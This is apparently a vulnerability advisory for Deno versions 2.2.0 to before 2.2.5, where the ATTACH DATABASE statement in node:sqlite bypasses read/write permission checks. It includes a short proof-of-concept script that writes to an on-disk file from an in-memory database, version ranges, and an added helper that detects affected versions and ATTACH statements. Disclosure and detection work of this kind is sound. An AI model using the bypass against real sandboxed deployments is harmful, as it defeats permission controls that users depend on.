Published: 04 Jun 2025
Source: github
GitHub: Reviewed
CVSS4: 5.5
CVSS3: 9.1
Description
Deno has --allow-read / --allow-write permission bypass in node:sqlite
Summary
It is possible to bypass Deno's read/write permission checks by using the `ATTACH DATABASE` statement.
PoC
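```js
// poc.js
import { DatabaseSync } from "node:sqlite";

// Open an in-memory database, then reach an on-disk file through SQL.
const db = new DatabaseSync(":memory:");
db.exec("ATTACH DATABASE 'test.db' as test;");
// Creating a table in the attached database writes to test.db.
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");
```

```sh
$ deno poc.js
```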
Packages
Name: deno (rust)
Affected versions: >= 2.2.0, < 2.2.5
Fixed version: 2.2.5
Name: deno_node (rust)
Affected versions: >= 0.129.0, < 0.134.0
Fixed version: 0.134.0
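An added example, not part of the advisory or of Deno's code: a JavaScript helper that checks a version against the affected ranges listed above and flags `ATTACH` statements in SQL text headed for a `node:sqlite` handle. The function names and the sample SQL are constructed for illustration, and the statement scan is a heuristic, not a full SQLite parser.

```javascript
// Affected ranges from the advisory above: [first affected, first fixed).
const AFFECTED = { deno: ["2.2.0", "2.2.5"], deno_node: ["0.129.0", "0.134.0"] };

// "v2.2.5-rc.1" -> { nums: [2, 2, 5], pre: true }
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: Boolean(m[4]) };
}

// Negative, zero or positive; a pre-release sorts before its release.
function compareVersions(a, b) {
  const x = parseVersion(a), y = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (x.nums[i] !== y.nums[i]) return x.nums[i] - y.nums[i];
  }
  return Number(y.pre) - Number(x.pre);
}

// True when `version` of `pkg` falls inside the advisory's affected range.
function isAffected(pkg, version) {
  const range = AFFECTED[pkg];
  if (!range) throw new Error(`no advisory range for package: ${pkg}`);
  return compareVersions(version, range[0]) >= 0 && compareVersions(version, range[1]) < 0;
}

// Heuristic scan (not a full SQLite parser): mask comments and quoted tokens,
// keeping offsets, then return every statement that begins with ATTACH.
function attachStatements(sql) {
  const masked = sql.replace(
    /--[^\n]*|\/\*[\s\S]*?\*\/|'(?:[^']|'')*'|"(?:[^"]|"")*"/g,
    (m) => (m[0] === "-" || m[0] === "/" ? " " : "_").repeat(m.length)
  );
  const hits = [];
  let start = 0;
  for (const part of masked.split(";")) {
    if (/^\s*ATTACH\b/i.test(part)) hits.push(sql.slice(start, start + part.length).trim());
    start += part.length + 1;
  }
  return hits;
}

// Constructed sample: only the last statement is a real ATTACH.
const SAMPLE_SQL = `CREATE TABLE t (note TEXT); -- ATTACH DATABASE 'x.db' AS x;
INSERT INTO t VALUES ('ATTACH; me');
attach database 'test.db' as test;`;
console.log(isAffected("deno", "2.2.4"), attachStatements(SAMPLE_SQL));
```

A version inside the affected range calls for upgrading to the fixed version listed above; the `ATTACH` scan shows where SQL reaching the database handle can name files on disk.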
Related vulnerabilities
CVSS3: 9.1
nvd
8 months ago
Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 2.2.0 and prior to version 2.2.5, it is possible to bypass Deno's read/write database permission check by using the `ATTACH DATABASE` statement. Version 2.2.5 contains a patch for the issue.